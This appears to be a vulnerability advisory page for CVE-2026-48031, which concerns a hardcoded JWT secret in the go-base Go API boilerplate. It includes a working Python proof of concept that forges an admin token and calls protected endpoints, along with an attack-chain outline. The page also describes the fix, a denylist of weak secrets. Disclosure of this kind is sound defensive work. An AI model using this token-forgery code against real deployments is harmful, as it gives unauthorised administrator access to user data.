Skip to main content

go-base CVE-2026-48031

CRITICAL
Use of Hard-coded Credentials (CWE-798)
2026-06-10 https://github.com/dhax/go-base GHSA-mqq6-462x-jxmm
Python PostgreSQL OpenSSL Authentication Bypass
9.1
CVSS 3.1
Share

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 10, 2026 - 14:21 vuln.today
Analysis Generated
Jun 10, 2026 - 14:21 vuln.today
CVE Published
Jun 10, 2026 - 13:39 nvd
CRITICAL 9.1

DescriptionNVD

Vulnerability: CWE-798 - Hardcoded JWT Secret + Broken Mitigation

Affected Component

  • github.com/dhax/go-base - Go REST API boilerplate (go-chi/jwtauth/v5, Viper, PostgreSQL/Bun)
  • 1,685 stars on GitHub

Vulnerability Locations

FileLineRole
dev.env10AUTH_JWT_SECRET=random - template default shipped to all users
cmd/serve.go35viper.SetDefault("auth_jwt_secret", "random") - code-level fallback
auth/jwt/tokenauth.go22-25Weak mitigation: only checked literal "random", auto-generated non-persistent key
auth/jwt/tokenauth.go28jwtauth.New("HS256", []byte(secret), nil) - creates JWT signer with the weak key
pwdless/api.go203GenTokenPair() - issues access + refresh tokens signed with the weak key

Data Flow

dev.env AUTH_JWT_SECRET=random
  OR
cmd/serve.go viper.SetDefault("auth_jwt_secret", "random")
    │
    ▼
auth/jwt/tokenauth.go: viper.GetString("auth_jwt_secret")
    │
    ▼
auth/jwt/tokenauth.go: jwtauth.New("HS256", []byte(secret), nil)
    │
    ▼
pwdless/api.go: GenTokenPair() → access + refresh tokens
    │
    ▼
jwt/authenticator.go: Every authenticated request trusts the forged token

Description

The JWT signing secret is hardcoded to the string "random" in two independent locations:

  1. dev.env:10 - The template .env file sets AUTH_JWT_SECRET=random. Every developer who copies this template gets the same default.
  2. cmd/serve.go:35 - viper.SetDefault("auth_jwt_secret", "random") provides a programmatic fallback. Even if the .env file is missing entirely, the application silently starts with "random" as the signing key.

The original code contained a mitigation in auth/jwt/tokenauth.go:22-25 that checked if the secret equaled "random" and replaced it with a randomly-generated 32-byte string. This mitigation had two fatal flaws:

  • (a) Single-value check: Only the exact string "random" was caught. Any other weak secret (e.g., "secret", "changeme", empty string) passed through unchecked.
  • (b) Non-persistent replacement: The auto-generated key was stored only in memory (randStringBytes(32)), not persisted. On every restart, all existing tokens became invalid without warning, breaking all active user sessions. This made the "fix" itself a denial-of-service.

An attacker who reads the public repository knows the signing key is "random". They can forge JWT tokens for arbitrary users (including admin roles), gaining complete authentication bypass on all protected API endpoints.

Proof of Concept

python
import jwt
import requests
# The hardcoded secret from dev.env / serve.go (public repository)
SECRET = "random"
BASE_URL = "http://target:3000"
# Step 1: Forge an admin JWT token
payload = {
    "sub": "admin@example.com",
    "roles": ["admin"],
    "iat": 9999999000,
    "exp": 9999999999
}
forged_token = jwt.encode(payload, SECRET, algorithm="HS256")
# Step 2: Access any protected endpoint with the forged token
headers = {"Authorization": f"Bearer {forged_token}"}
# List all users (requires admin)
r = requests.get(f"{BASE_URL}/api/v1/admin/users", headers=headers)
print(f"Status: {r.status_code}")
# 200 OK
# Access own profile with forged identity
r = requests.get(f"{BASE_URL}/api/v1/me", headers=headers)
print(f"Profile: {r.json()}")
# Returns admin@example.com profile
# The forged token is also accepted by refresh endpoints
r = requests.post(f"{BASE_URL}/api/v1/token/refresh", headers=headers)
# Returns a new valid token signed with the same "random" secret

Impact

  • Authentication Bypass: Forge tokens for any user, including admin roles
  • Confidentiality: Access all user data, profiles, and protected resources
  • Integrity: Modify any data accessible via the API
  • Persistence: Forged tokens remain valid until expiry (or indefinitely via refresh)

Fix (PR #31)

The fix replaced the single-value check with a comprehensive approach:

go
// BEFORE (tokenauth.go:22-25) - weak, single-value check
if secret == "random" {
    secret = randStringBytes(32) // non-persistent, breaks on restart
}

// AFTER - comprehensive known-weak-secrets map
var knownWeakSecrets = map[string]bool{
    "random": true,
    "secret": true,
    "changeme": true,
    "change-me": true,
    "default": true,
    "": true,
}

if knownWeakSecrets[secret] {
    log.Fatal("JWT secret is a known weak value. Please set a strong AUTH_JWT_SECRET.")
}

Plus: minimum 32-character length check, removal of non-persistent auto-generation, and clear generation instructions (openssl rand -base64 32) in the template.

Patched Versions

  • All versions after commit range including PR#31 (merged May 17, 2026).
  • Users should update to the latest master, regenerate their JWT secret, and restart.

Resources

  • Fix PR: https://github.com/dhax/go-base/pull/31
  • Commit history: https://github.com/dhax/go-base/commits/master

Credit

Reported by @saaa99999999 via manual security audit.

AnalysisAI

Authentication bypass in dhax/go-base Go REST API boilerplate (versions prior to commit cc82b974, merged May 17, 2026) allows remote unauthenticated attackers to forge JWT tokens for arbitrary users including administrators. The signing secret is hardcoded to the literal string 'random' in both the dev.env template and as a Viper default in cmd/serve.go, and publicly available exploit code exists in the advisory. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify go-base-derived API endpoint
Delivery
Read hardcoded 'random' secret from public repo
Exploit
Forge HS256 JWT with admin claims
Execution
Send Bearer token to protected endpoint
Persist
Refresh token to maintain access
Impact
Exfiltrate or modify user data
Sign in to reveal

Vulnerability AssessmentAI

Exploitation The target must be a running deployment of dhax/go-base (or a downstream fork) whose AUTH_JWT_SECRET configuration value resolves to the literal string 'random' - either because the operator copied dev.env unchanged, omitted the variable entirely so the Viper default in cmd/serve.go:35 takes effect, or otherwise failed to override it. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment CVSS 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N) reflects fully remote, unauthenticated, low-complexity exploitation with high confidentiality and integrity impact and no availability impact - consistent with token forgery rather than service disruption. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker enumerates internet-exposed APIs derived from go-base, reads the public repository to recover the hardcoded HS256 secret 'random', and uses the published Python PoC (PyJWT-based) to mint a JWT with claims such as sub=admin@example.com and roles=['admin'] and an arbitrarily distant expiry. They then submit the forged Bearer token to admin endpoints like /api/v1/admin/users to enumerate accounts and to /api/v1/token/refresh to obtain fresh tokens, achieving persistent admin-level access without ever interacting with login or password reset flows.
Remediation Upgrade to the fixed Go pseudo-version 0.0.0-20260517152733-cc82b9740fa6 or later by pulling the current master, which includes PR #31 (https://github.com/dhax/go-base/pull/31) and commit cc82b9740fa6b08e0fad409cd4b418e240dd0e00; the fix replaces the single-value check with a known-weak-secrets denylist ('random', 'secret', 'changeme', 'change-me', 'default', empty), enforces a 32-character minimum, removes non-persistent auto-generation, and instructs operators to set AUTH_JWT_SECRET to the output of 'openssl rand -base64 64'. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Identify and inventory all applications using dhax/go-base template; determine deployed versions and which systems are publicly exposed. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-43986 CRITICAL
9.9 Jun 04

Unauthenticated server-side request forgery in Tautulli versions prior to 2.17.1 allows remote attackers to coerce the T
CVE-2026-47731 CRITICAL
9.1 Jun 05

Path traversal in NASA AMMOS AIT-Core's Binary Stream Capture (BSC) component allows unauthenticated remote attackers to
CVE-2026-41065 HIGH
8.9 Jun 04

Remote code execution in Tautulli versions prior to 2.17.1 allows attackers to achieve unauthenticated RCE on fresh inst
CVE-2026-43984 HIGH
8.9 Jun 04

Stored cross-site scripting in Tautulli before 2.17.1 allows low-privilege authenticated users (including guests when gu
CVE-2026-11393 HIGH
8.8 Jun 08

Remote code execution in AWS AgentCore CLI before v0.14.2 allows authenticated attackers to inject Python code via craft

Share

CVE-2026-48031 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy